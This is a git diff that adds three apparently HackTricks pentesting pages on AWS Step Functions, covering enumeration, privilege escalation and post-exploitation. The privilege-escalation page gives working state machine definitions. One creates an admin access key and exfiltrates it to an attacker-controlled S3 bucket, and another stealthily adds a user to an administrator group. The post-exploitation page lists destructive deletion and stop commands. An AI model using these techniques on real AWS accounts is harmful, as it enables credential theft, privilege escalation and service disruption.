diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
new file mode 100644
index 0000000000..00917567ca
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -0,0 +1,95 @@
+# AWS - Step Functions Post Exploitation
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Step Functions
+
+For more information about this AWS service, check:
+
+{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %}
+[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md)
+{% endcontent-ref %}
+
+### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`
+
+An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations.
+
+{% hint style="info" %}
+
+- Deleting a state machine you also delete all its associated versions and aliases.
+- Deleting a state machine alias you do not delete the state machine versions referecing this alias.
+- It is not possible to delete a state machine version currently referenced by one o more aliases.
+
+{% endhint %}
+
+```bash
+# Delete state machine
+aws stepfunctions delete-state-machine --state-machine-arn
+# Delete state machine version
+aws stepfunctions delete-state-machine-version --state-machine-version-arn
+# Delete state machine alias
+aws stepfunctions delete-state-machine-alias --state-machine-alias-arn
+```
+
+- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.
+
+### `states:UpdateMapRun`
+
+An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows.
+
+```bash
+aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ]
+```
+
+- **Potential Impact**: Performance degradation, and disruption of critical workflows.
+
+### `states:StopExecution`
+
+An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.
+
+{% hint style="warning" %}
+This action is not supported by **express state machines**.
+{% endhint %}
+
+```bash
+aws stepfunctions stop-execution --execution-arn [--error ] [--cause ]
+```
+
+- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.
+
+### `states:TagResource`, `states:UntagResource`
+
+An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+```bash
+aws stepfunctions tag-resource --resource-arn --tags Key=,Value=
+aws stepfunctions untag-resource --resource-arn --tag-keys
+```
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
new file mode 100644
index 0000000000..04fc237b21
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
@@ -0,0 +1,270 @@
+# AWS - Step Functions Privesc
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Step Functions
+
+For more information about this AWS service, check:
+
+{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %}
+[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md)
+{% endcontent-ref %}
+
+### `states:TestState` & `iam:PassRole`
+
+An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation.
+
+```bash
+aws states test-state --definition --role-arn [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets]
+```
+
+The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action:
+
+- **stateDefinition.json**:
+
+```json
+{
+ "Type": "Task",
+ "Parameters": {
+ "UserName": "admin"
+ },
+ "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+ "End": true
+}
+```
+
+- **Command** executed to perform the privesc:
+
+```bash
+aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam:::role/PermissiveRole
+
+{
+ "output": "{
+ \"AccessKey\":{
+ \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
+ \"CreateDate\":\"2024-07-09T16:59:11Z\",
+ \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
+ \"Status\":\"Active\",
+ \"UserName\":\"admin\"
+ }
+ }",
+ "status": "SUCCEEDED"
+}
+```
+
+- **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+
+### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`)
+
+An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine.
+
+```bash
+# Create a state machine
+aws states create-state-machine --name --definition --role-arn [--type ] [--logging-configuration ]\
+[--tracing-configuration ] [--publish | --no-publish] [--version-description ]
+# Start a state machine execution
+aws states start-execution --state-machine-arn [--name ] [--input ] [--trace-header ]
+# Start a Synchronous Express state machine execution
+aws states start-sync-execution --state-machine-arn [--name ] [--input ] [--trace-header ]
+```
+
+The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions.
+
+- **stateMachineDefinition.json**:
+
+```json
+{
+ "Comment": "Malicious state machine to create IAM access key and upload to S3",
+ "StartAt": "CreateAccessKey",
+ "States": {
+ "CreateAccessKey": {
+ "Type": "Task",
+ "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+ "Parameters": {
+ "UserName": "admin"
+ },
+ "ResultPath": "$.AccessKeyResult",
+ "Next": "PrepareS3PutObject"
+ },
+ "PrepareS3PutObject": {
+ "Type": "Pass",
+ "Parameters": {
+ "Body.$": "$.AccessKeyResult.AccessKey",
+ "Bucket": "attacker-controlled-S3-bucket",
+ "Key": "AccessKey.json"
+ },
+ "ResultPath": "$.S3PutObjectParams",
+ "Next": "PutObject"
+ },
+ "PutObject": {
+ "Type": "Task",
+ "Resource": "arn:aws:states:::aws-sdk:s3:putObject",
+ "Parameters": {
+ "Body.$": "$.S3PutObjectParams.Body",
+ "Bucket.$": "$.S3PutObjectParams.Bucket",
+ "Key.$": "$.S3PutObjectParams.Key"
+ },
+ "End": true
+ }
+ }
+}
+```
+
+- **Command** executed to **create the state machine**:
+
+```bash
+aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
+{
+ "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
+ "creationDate": "2024-07-09T20:29:35.381000+02:00"
+}
+```
+
+- **Command** executed to **start an execution** of the previously created state machine:
+
+```json
+aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
+{
+ "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+ "startDate": "2024-07-09T20:33:35.466000+02:00"
+}
+```
+
+{% hint style="warning" %}
+
+The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account.
+
+{% endhint %}
+
+- **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+
+### `states:UpdateStateMachine` & (not always required) `iam:PassRole`
+
+An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+
+Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations:
+
+1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough.
+2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition.
+
+```bash
+aws states update-state-machine --state-machine-arn [--definition ] [--role-arn ] [--logging-configuration ] \
+[--tracing-configuration ] [--publish | --no-publish] [--version-description ]
+```
+
+The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+
+{% hint style="warning" %}
+
+If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached).
+
+{% endhint %}
+
+{% tabs %}
+
+{% tab title="Legit State Machine" %}
+
+```json
+{
+ "Comment": "Hello world from Lambda state machine",
+ "StartAt": "Start PassState",
+ "States": {
+ "Start PassState": {
+ "Type": "Pass",
+ "Next": "LambdaInvoke"
+ },
+ "LambdaInvoke": {
+ "Type": "Task",
+ "Resource": "arn:aws:states:::lambda:invoke",
+ "Parameters": {
+ "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+ },
+ "Next": "End PassState"
+ },
+ "End PassState": {
+ "Type": "Pass",
+ "End": true
+ }
+ }
+}
+```
+
+{% endtab %}
+
+{% tab title="Malicious Updated State Machine" %}
+
+```json
+{
+ "Comment": "Hello world from Lambda state machine",
+ "StartAt": "Start PassState",
+ "States": {
+ "Start PassState": {
+ "Type": "Pass",
+ "Next": "LambdaInvoke"
+ },
+ "LambdaInvoke": {
+ "Type": "Task",
+ "Resource": "arn:aws:states:::lambda:invoke",
+ "Parameters": {
+ "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+ },
+ "Next": "AddUserToGroup"
+ },
+ "AddUserToGroup": {
+ "Type": "Task",
+ "Parameters": {
+ "GroupName": "administrator",
+ "UserName": "unprivilegedUser"
+ },
+ "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
+ "Next": "End PassState"
+ },
+ "End PassState": {
+ "Type": "Pass",
+ "End": true
+ }
+ }
+}
+```
+
+{% endtab %}
+
+{% endtabs %}
+
+- **Command** executed to **update** **the legit state machine**:
+
+```bash
+aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
+{
+ "updateDate": "2024-07-10T20:07:10.294000+02:00",
+ "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+```
+
+- **Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
diff --git a/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
new file mode 100644
index 0000000000..38c7f2d11b
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
@@ -0,0 +1,373 @@
+# AWS - Step Functions Enum
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Step Functions
+
+AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL).
+
+AWS Step Functions simplifies the process of building resilient and scalable applications by managing the underlying infrastructure, handling retries, errors, and parallel processing automatically. It is particularly useful for creating complex workflows involving multiple steps and decision points, as it can easily manage the flow of data and execution state across services. The main use cases to be performed by this service are the following ones:
+
+- **Data processing**: File, video and image processing; extraction, transformation and load (ETL) of jobs; and Batch processing and High Performance Computing (HPC) workloads.
+- **Machine learning**: Fraud detection, customization, recommendation and data enrichment.
+- **Microservice orchestration**: Synchronous or real-time workflows and container orchestration.
+- **IT and security automation**: Auto-remediation, deployment and response; and human approval and escalation.
+
+## Key concepts
+
+### Standard vs. Express Workflows
+
+AWS Step Functions offers two types of **state machine workflows**: Standard and Express.
+
+- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year.
+- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage.
+
+### States
+
+States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type:
+
+- **Task:** Executes a job, often using an AWS service like Lambda.
+- **Choice:** Makes decisions based on input.
+- **Fail/Succeed:** Ends the execution with a failure or success.
+- **Pass:** Passes input to output or injects data.
+- **Wait:** Delays execution for a set time.
+- **Parallel:** Initiates parallel branches.
+- **Map:** Dynamically iterates steps over items.
+
+### Task
+
+A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs.
+
+- **Activities**: Custom workers you manage, suitable for long-running processes.
+ - Resource: **`arn:aws:states:region:account:activity:name`**.
+- **Lambda Functions**: Executes AWS Lambda functions.
+ - Resource: **`arn:aws:lambda:region:account:function:function-name`**.
+- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3.
+ - Resource: **`arn:partition:states:region:account:servicename:APIname`**.
+- **HTTP Task**: Calls third-party APIs.
+ - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details.
+
+The following example shows a Task state definition that invokes a Lambda function called HelloWorld:
+
+```json
+"HelloWorld": {
+ "Type": "Task",
+ "Resource": "arn:aws:states:::lambda:invoke",
+ "Parameters": {
+ "Payload.$": "$",
+ "FunctionName": "arn:aws:lambda:::function:HelloWorld"
+ },
+ "End": true
+}
+```
+
+### Choice
+
+A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results.
+
+- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable.
+- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true.
+
+Example of **Choice** state:
+
+```json
+{
+ "Variable": "$.timeStamp",
+ "TimestampEquals": "2000-01-01T00:00:00Z",
+ "Next": "TimeState"
+}
+```
+
+### Fail/Succeed
+
+A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow.
+
+A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field.
+
+{% tabs %}
+
+{% tab title="Fail example" %}
+
+```json
+"FailState": {
+ "Type": "Fail",
+ "Error": "ErrorName",
+ "Cause": "Error details"
+}
+```
+
+{% endtab %}
+
+{% tab title="Succeed example" %}
+
+```json
+"SuccessState": {
+ "Type": "Succeed"
+}
+```
+
+{% endtab %}
+
+{% endtabs %}
+
+### Pass
+
+A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it.
+
+```json
+"PassState": {
+ "Type": "Pass",
+ "Result": {"key": "value"},
+ "ResultPath": "$.newField",
+ "Next": "NextState"
+}
+```
+
+### Wait
+
+A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time:
+
+- **X Seconds**: A fixed number of seconds to wait.
+
+ ```json
+ "WaitState": {
+ "Type": "Wait",
+ "Seconds": 10,
+ "Next": "NextState"
+ }
+ ```
+
+- **Absolute Timestamp**: An exact time to wait until.
+
+ ```json
+ "WaitState": {
+ "Type": "Wait",
+ "Timestamp": "2024-03-14T01:59:00Z",
+ "Next": "NextState"
+ }
+ ```
+
+- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**.
+
+ ```json
+ jsonCopiar código
+ "WaitState": {
+ "Type": "Wait",
+ "TimestampPath": "$.expirydate",
+ "Next": "NextState"
+ }
+ ```
+
+
+### Parallel
+
+A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are:
+
+- **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine.
+- **ResultPath**: Defines where (in the input) to place the combined output of the branches.
+- **Retry and Catch**: Error handling configurations for the parallel state.
+
+```json
+"ParallelState": {
+ "Type": "Parallel",
+ "Branches": [
+ {
+ "StartAt": "Task1",
+ "States": { ... }
+ },
+ {
+ "StartAt": "Task2",
+ "States": { ... }
+ }
+ ],
+ "Next": "NextState"
+}
+```
+
+### Map
+
+A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes:
+
+- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state.
+
+ ```json
+ "MapState": {
+ "Type": "Map",
+ "ItemsPath": "$.arrayItems",
+ "ItemProcessor": {
+ "ProcessorConfig": {
+ "Mode": "INLINE"
+ },
+ "StartAt": "AddState",
+ "States": {
+ "AddState": {
+ "Type": "Task",
+ "Resource": "arn:aws:states:::lambda:invoke",
+ "OutputPath": "$.Payload",
+ "Parameters": {
+ "FunctionName": "arn:aws:lambda:::function:add-function"
+ },
+ "End": true
+ }
+ }
+ },
+ "End": true
+ "ResultPath": "$.detail.added",
+ "ItemsPath": "$.added"
+ }
+ ```
+
+- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution.
+
+ ```json
+ "DistributedMapState": {
+ "Type": "Map",
+ "ItemReader": {
+ "Resource": "arn:aws:states:::s3:getObject",
+ "Parameters": {
+ "Bucket": "my-bucket",
+ "Key": "data.csv"
+ }
+ },
+ "ItemProcessor": {
+ "ProcessorConfig": {
+ "Mode": "DISTRIBUTED",
+ "ExecutionType": "EXPRESS"
+ },
+ "StartAt": "ProcessItem",
+ "States": {
+ "ProcessItem": {
+ "Type": "Task",
+ "Resource": "arn:aws:lambda:region:account-id:function:my-function",
+ "End": true
+ }
+ }
+ },
+ "End": true
+ "ResultWriter": {
+ "Resource": "arn:aws:states:::s3:putObject",
+ "Parameters": {
+ "Bucket": "myOutputBucket",
+ "Prefix": "csvProcessJobs"
+ }
+ }
+ }
+ ```
+
+
+### Versions and aliases
+
+Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine.
+
+- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version.
+- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management.
+
+For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html).
+
+
+
+## IAM Roles for State machines
+
+AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions:
+
+- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions.
+- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted.
+- **Least Privilege**: It's recommended to follow the principle of least privilege when configuring IAM roles for Step Functions. This means granting only the permissions necessary for the state machine to perform its specific actions, and no more. IAM policies should be scoped to specific resources and actions, reducing the risk of unintended access.
+
+## Enumeration
+
+ReadOnlyAccess policy is enough for all the following enumeration actions.
+
+```bash
+# State machines #
+
+## List state machines
+aws stepfunctions list-state-machines
+## Retrieve informatio about the specified state machine
+aws stepfunctions describe-state-machine --state-machine-arn
+
+## List verions for the specified state machine
+aws stepfunctions list-state-machine-versions --state-machine-arn
+## List aliases for the specified state machine
+aws stepfunctions list-state-machine-aliases --state-machine-arn
+## Retrieve informatio about the specified state machine alias
+aws stepfunctions describe-state-machine-alias --state-machine-alias-arn
+
+## List executions of a state machine
+aws stepfunctions list-executions --state-machine-arn [--status-filter ] [--redrive-filter ]
+## Retrieve information and relevant metadata about a state machine execution
+aws stepfunctions describe-execution --execution-arn
+## Retrieve information about the state machine associated to the specified execution
+aws stepfunctions describe-state-machine-for-execution --execution-arn
+## Retrieve the history of the specified execution as a list of events
+aws stepfunctions get-execution-history --execution-arn [--reverse-order | --no-reverse-order] [--include-execution-data | --no-include-execution-data]
+
+## List tags for the specified Ste Functions resource
+aws stepfunctions list-tags-for-resource --resource-arn
+
+## Validate the definition of a state machine without creating the resource
+aws stepfunctions validate-state-machine-definition --definition [--type ]
+
+# Activities #
+
+## List existing activities
+aws stepfunctions list-activities
+## Retrieve information about the specified activity
+aws stepfunctions describe-activity --activity-arn
+
+# Map Runs #
+
+## List map runs of an execution
+aws stepfunctions list-map-runs --execution-arn
+## Provide information about the configuration, progress and results of a Map Run
+aws stepfunctions describe-map-run --map-run-arn
+## Lists executions of a Map Run
+aws stepfunctions list-executions --map-run-arn [--status-filter ] [--redrive-filter ]
+```
+
+
+## Privesc
+
+In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-stepfunctions-privesc.md" %}
+[aws-stepfunctions-privesc.md](../aws-privilege-escalation/aws-stepfunctions-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-stepfunctions-post-exploitation/" %}
+[aws-stepfunctions-post-exploitation](../aws-post-exploitation/aws-stepfunctions-post-exploitation/)
+{% endcontent-ref %}
+
+# References
+
+* [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsstepfunctions.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsstepfunctions.html)
+* [https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html](https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html)
+* [https://states-language.net/spec.html](https://states-language.net/spec.html)
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+